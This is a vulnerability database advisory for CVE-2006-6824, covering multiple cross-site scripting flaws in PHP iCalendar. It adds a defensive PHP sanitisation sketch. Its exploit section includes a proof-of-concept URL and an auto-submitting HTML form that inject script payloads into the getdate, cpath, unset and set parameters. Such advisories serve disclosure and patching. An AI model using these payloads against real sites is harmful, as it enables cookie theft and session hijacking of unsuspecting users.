Jim Hu and Chad Little PHP iCalendar Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1111879
Vulnerability type: Cross-site scripting
Published: 2006-12-27
Updated: 2007-01-10
CVE ID: CVE-2006-6824
CNNVD-ID: CNNVD-200612-602
Platform: PHP
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/29370
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-602
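|Vulnerability details
Jim Hu and Chad Little PHP iCalendar contains multiple cross-site scripting (XSS) vulnerabilities. Remote attackers can inject arbitrary web script or HTML via (1) the getdate parameter in (a) day.php, (b) month.php, (c) year.php, (d) week.php, (e) search.php, (f) rss/index.php, (g) print.php and (h) preferences.php; (2) the cpath parameter in (i) day.php, (j) month.php, (k) year.php, (l) week.php and (m) search.php; (3) the query parameter in search.php; and possibly the cpath, (4) unset and (5) set parameters within the setcookie action in preferences.php.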
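A defensive sketch for the parameters listed above, added here as an example; it is not PHP iCalendar's own code or its actual fix. The helper names `clean_getdate()` and `h()` are hypothetical, and the YYYYMMDD shape of getdate is an assumption taken from the sample value 20061227 in the PoC URL.

```php
<?php
// Added example: hypothetical helpers, not PHP iCalendar's own code.

// Assumption: getdate is a calendar date in YYYYMMDD form. A value with a
// fixed shape is validated strictly; anything else falls back to today.
function clean_getdate(?string $raw): string
{
    if ($raw !== null
        && preg_match('/\A(\d{4})(\d{2})(\d{2})\z/', $raw, $m)
        && checkdate((int) $m[2], (int) $m[3], (int) $m[1])) {
        return $raw;
    }
    return date('Ymd');
}

// Free-form values (cpath, query, set, unset) have no fixed shape, so they
// are encoded for the HTML context at the point of output.
function h(?string $raw): string
{
    return htmlspecialchars($raw ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request values modelled on the PoC on this page.
$request = [
    'getdate' => '20061227"><script>alert()</script>',
    'cpath'   => '<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>',
    'query'   => 'team meeting',
];

$getdate = clean_getdate($request['getdate'] ?? null);
$cpath   = $request['cpath'] ?? '';
$query   = $request['query'] ?? '';

// URL context: percent-encode the value, then HTML-encode the whole attribute.
$href = 'day.php?getdate=' . $getdate . '&cpath=' . rawurlencode($cpath);
echo '<a href="' . h($href) . '">Day view</a>', "\n";

// Attribute and text contexts: HTML-encode the raw value.
echo '<input type="text" name="query" value="' . h($query) . '">', "\n";
echo '<p>Calendar path: ' . h($cpath) . '</p>', "\n";
```

With the constructed input, getdate is replaced by the current date because it is not exactly eight digits, and the cpath markup is emitted as inert text rather than as a script element.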
|Exploit
source: http://www.securityfocus.com/bid/21792/info
       
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 
       
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
       
http://www.example.com/phpicalendar/preferences.php?cal=Home,US+Holidays,Work&getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E

<html>
<head></head>
<body>
<title>PHP icalendar XSS in preferences.php PoC</title>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host , by default http://localhost/</P>
<br /><br />
<form method='post' action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish' name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text' value='all_calendars_combined971' name='cookie_calendar' style='width: 80%' /><br>
cpath: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view' style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time' style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday' name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style' style='width: 80%' /><br>
unset: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='unset' style='width: 80%' /><br>
set: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post' action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish' name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text' value='all_calendars_combined971' name='cookie_calendar' style='width: 80%' /><br>
cpath: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view' style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time' style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday' name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style' style='width: 80%' /><br>
unset: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='unset' style='width: 80%' /><br>
set: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
<script> document.forms[0].submit() </script>
</textarea>
</body>
</html>
|References

Source: XF
Name: phpicalendar-multiple-scripts-xss(31146)
Link: http://xforce.iss.net/xforce/xfdb/31146
Source: BID
Name: 21792
Link: http://www.securityfocus.com/bid/21792
Source: BUGTRAQ
Name: 20071220 PHP iCalendar <= 2.24 - Cross-Site Scripting Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/485397/100/200/threaded
Source: OSVDB
Name: 32500
Link: http://www.osvdb.org/32500
Source: OSVDB
Name: 32499
Link: http://www.osvdb.org/32499
Source: OSVDB
Name: 32498
Link: http://www.osvdb.org/32498
Source: OSVDB
Name: 32497
Link: http://www.osvdb.org/32497
Source: OSVDB
Name: 32496
Link: http://www.osvdb.org/32496
Source: OSVDB
Name: 32495
Link: http://www.osvdb.org/32495
Source: OSVDB
Name: 32494
Link: http://www.osvdb.org/32494
Source: OSVDB
Name: 32493
Link: http://www.osvdb.org/32493
Source: SECTRACK
Name: 1017449
Link: http://securitytracker.com/id?1017449
Source: SECUNIA
Name: 23499
Link: http://secunia.com/advisories/23499
Source: MISC
Link: http://lostmon.blogspot.com/2006/12/php-icalendar-multiple-variable-cross.html